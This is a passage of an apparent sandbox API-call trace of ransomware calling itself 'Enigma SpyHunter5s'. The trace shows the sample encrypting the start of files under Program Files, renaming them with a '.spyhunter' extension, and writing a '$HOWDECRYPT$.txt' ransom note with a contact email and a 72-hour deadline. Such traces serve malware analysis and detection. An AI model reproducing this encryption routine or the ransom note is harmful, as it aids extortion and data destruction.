(x86)\\Mozilla Firefox\\browser\\blocklist.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.319] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml") returned 64 [0164.319] StrStrW (lpFirst="blocklist.xml", lpSrch=".txt") returned 0x0 [0164.319] GetProcessHeap () returned 0x2c0000 [0164.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.319] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e76c*=0x2800, lpOverlapped=0x0) returned 1 [0164.396] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.396] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e76c*=0x2800, lpOverlapped=0x0) returned 1 [0164.396] GetProcessHeap () returned 0x2c0000 [0164.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.396] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.396] WriteFile (in: hFile=0xa0, lpBuffer=0x57e7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x57e7ac*, lpNumberOfBytesWritten=0x57e76c*=0x4, lpOverlapped=0x0) returned 1 [0164.397] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e76c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e76c*=0x30, lpOverlapped=0x0) returned 1 [0164.397] CloseHandle (hObject=0xa0) returned 1 [0164.397] GetProcessHeap () returned 0x2c0000 [0164.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.397] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.spyhunter") returned 74 [0164.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml.spyhunter")) returned 1 [0164.398] GetProcessHeap () returned 0x2c0000 [0164.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.398] GetProcessHeap () returned 0x2c0000 [0164.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.398] GetProcessHeap () returned 0x2c0000 [0164.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e064c8 | out: hHeap=0x2c0000) returned 1 [0164.399] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7a8 | out: pbBuffer=0x57e7a8) returned 1 [0164.399] GetProcessHeap () returned 0x2c0000 [0164.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0164.399] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7a0*=0x30) returned 1 [0164.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.464] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml") returned 77 [0164.464] StrStrW (lpFirst="AssemblyList_4_client.xml", lpSrch=".txt") returned 0x0 [0164.464] GetProcessHeap () returned 0x2c0000 [0164.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0164.464] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e764*=0x2800, lpOverlapped=0x0) returned 1 [0164.526] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.526] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e764*=0x2800, lpOverlapped=0x0) returned 1 [0164.526] GetProcessHeap () returned 0x2c0000 [0164.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0164.526] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.526] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x57e7a4*, lpNumberOfBytesWritten=0x57e764*=0x4, lpOverlapped=0x0) returned 1 [0164.551] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e764*=0x30, lpOverlapped=0x0) returned 1 [0164.551] CloseHandle (hObject=0xb0) returned 1 [0164.553] GetProcessHeap () returned 0x2c0000 [0164.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.553] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.spyhunter") returned 87 [0164.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml.spyhunter")) returned 1 [0164.554] GetProcessHeap () returned 0x2c0000 [0164.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.554] GetProcessHeap () returned 0x2c0000 [0164.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.554] GetProcessHeap () returned 0x2c0000 [0164.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeaf50 | out: hHeap=0x2c0000) returned 1 [0164.554] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7a8 | out: pbBuffer=0x57e7a8) returned 1 [0164.554] GetProcessHeap () returned 0x2c0000 [0164.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0164.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7a0*=0x30) returned 1 [0164.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.580] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll") returned 77 [0164.580] StrStrW (lpFirst="VSTAProject.dll", lpSrch=".txt") returned 0x0 [0164.580] GetProcessHeap () returned 0x2c0000 [0164.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.580] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e764*=0x2800, lpOverlapped=0x0) returned 1 [0164.598] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.598] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e764*=0x2800, lpOverlapped=0x0) returned 1 [0164.598] GetProcessHeap () returned 0x2c0000 [0164.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.598] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.598] WriteFile (in: hFile=0x9c, lpBuffer=0x57e7a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x57e7a4*, lpNumberOfBytesWritten=0x57e764*=0x4, lpOverlapped=0x0) returned 1 [0164.694] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e764, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e764*=0x30, lpOverlapped=0x0) returned 1 [0164.694] CloseHandle (hObject=0x9c) returned 1 [0164.700] GetProcessHeap () returned 0x2c0000 [0164.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.700] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.spyhunter") returned 87 [0164.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\VSTAProject.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\vstaproject.dll.spyhunter")) returned 1 [0164.701] GetProcessHeap () returned 0x2c0000 [0164.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.701] GetProcessHeap () returned 0x2c0000 [0164.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0164.701] GetProcessHeap () returned 0x2c0000 [0164.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeabb0 | out: hHeap=0x2c0000) returned 1 [0164.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.862] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.862] WriteFile (in: hFile=0xa0, lpBuffer=0x57e6d7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e800, lpOverlapped=0x0 | out: lpBuffer=0x57e6d7*, lpNumberOfBytesWritten=0x57e800*=0x127, lpOverlapped=0x0) returned 1 [0164.863] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.863] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e800, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e800*=0x2ac, lpOverlapped=0x0) returned 1 [0164.863] CloseHandle (hObject=0xa0) returned 1 [0164.863] GetProcessHeap () returned 0x2c0000 [0164.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8588 | out: hHeap=0x2c0000) returned 1 [0164.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7a0 | out: pbBuffer=0x57e7a0) returned 1 [0164.863] GetProcessHeap () returned 0x2c0000 [0164.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0164.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e798*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e798*=0x30) returned 1 [0164.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.866] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip") returned 109 [0164.866] StrStrW (lpFirst="Text.zip", lpSrch=".txt") returned 0x0 [0164.866] GetProcessHeap () returned 0x2c0000 [0164.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.866] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e75c*=0x22b, lpOverlapped=0x0) returned 1 [0164.867] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.868] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x57e75c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e75c*=0x22b, lpOverlapped=0x0) returned 1 [0164.868] GetProcessHeap () returned 0x2c0000 [0164.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.868] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.868] WriteFile (in: hFile=0xa0, lpBuffer=0x57e79c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e75c, lpOverlapped=0x0 | out: lpBuffer=0x57e79c*, lpNumberOfBytesWritten=0x57e75c*=0x4, lpOverlapped=0x0) returned 1 [0164.868] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e75c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e75c*=0x30, lpOverlapped=0x0) returned 1 [0164.868] CloseHandle (hObject=0xa0) returned 1 [0164.868] GetProcessHeap () returned 0x2c0000 [0164.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.868] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.spyhunter") returned 119 [0164.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip.spyhunter")) returned 1 [0164.939] GetProcessHeap () returned 0x2c0000 [0164.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.939] GetProcessHeap () returned 0x2c0000 [0164.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0164.939] GetProcessHeap () returned 0x2c0000 [0164.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac870 | out: hHeap=0x2c0000) returned 1 [0164.940] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e798 | out: pbBuffer=0x57e798) returned 1 [0164.940] GetProcessHeap () returned 0x2c0000 [0164.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0164.940] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e790*=0x30) returned 1 [0164.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.941] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip") returned 111 [0164.941] StrStrW (lpFirst="Module.zip", lpSrch=".txt") returned 0x0 [0164.941] GetProcessHeap () returned 0x2c0000 [0164.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.941] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e754*=0x24f, lpOverlapped=0x0) returned 1 [0164.942] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.942] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e754*=0x24f, lpOverlapped=0x0) returned 1 [0164.942] GetProcessHeap () returned 0x2c0000 [0164.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.942] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.942] WriteFile (in: hFile=0xa0, lpBuffer=0x57e794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x57e794*, lpNumberOfBytesWritten=0x57e754*=0x4, lpOverlapped=0x0) returned 1 [0164.942] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e754*=0x30, lpOverlapped=0x0) returned 1 [0164.943] CloseHandle (hObject=0xa0) returned 1 [0164.943] GetProcessHeap () returned 0x2c0000 [0164.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.943] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.spyhunter") returned 121 [0164.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip.spyhunter")) returned 1 [0165.029] GetProcessHeap () returned 0x2c0000 [0165.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.030] GetProcessHeap () returned 0x2c0000 [0165.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.030] GetProcessHeap () returned 0x2c0000 [0165.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac748 | out: hHeap=0x2c0000) returned 1 [0165.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e798 | out: pbBuffer=0x57e798) returned 1 [0165.030] GetProcessHeap () returned 0x2c0000 [0165.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e790*=0x30) returned 1 [0165.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip") returned 114 [0165.031] StrStrW (lpFirst="MDIParent.zip", lpSrch=".txt") returned 0x0 [0165.031] GetProcessHeap () returned 0x2c0000 [0165.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.032] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e754*=0x2800, lpOverlapped=0x0) returned 1 [0165.134] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.134] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e754*=0x2800, lpOverlapped=0x0) returned 1 [0165.134] GetProcessHeap () returned 0x2c0000 [0165.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0165.135] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.135] WriteFile (in: hFile=0xa0, lpBuffer=0x57e794*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x57e794*, lpNumberOfBytesWritten=0x57e754*=0x4, lpOverlapped=0x0) returned 1 [0165.216] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e754, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e754*=0x30, lpOverlapped=0x0) returned 1 [0165.216] CloseHandle (hObject=0xa0) returned 1 [0165.216] GetProcessHeap () returned 0x2c0000 [0165.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.216] wnsprintfW (in: 